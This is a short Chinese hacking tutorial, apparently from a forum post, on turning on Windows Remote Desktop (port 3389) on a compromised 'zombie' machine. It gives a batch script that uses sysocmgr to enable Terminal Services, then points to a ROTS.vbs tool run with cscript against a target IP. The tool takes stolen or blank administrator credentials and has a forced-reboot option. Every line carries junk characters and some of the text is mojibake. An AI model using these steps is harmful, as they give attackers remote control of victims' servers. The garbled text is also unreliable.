[hide=60] 1.打开记事本,编辑内容如下:
*z&m=G\ echo [Components] > c:\sql
z)*7LI echo TSEnable = on >> c:\sql
C7:;<<"P sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
[<CIh46S. 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
os9X)G 8K$q6V%# 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
U 51C /A 地址:
www.netsill.com/rots.zip Q4i@y6z 使用方法:
;w--fqxVl 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
Pv,Q*gh` LX5, _`B c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
5F&xU$$a- 8$4@U;Vh; 服务端口: 设置终端服务的服务端口。默认是3389。
$ReoIU^< 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
tn>z%6;&Z 使用/fr表示强制重起目标。(如果/r不行,可以允哉飧觯?BR>使用此参数时,端口设置不能忽略。
f}qR'ognUu 比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
Gpv9~&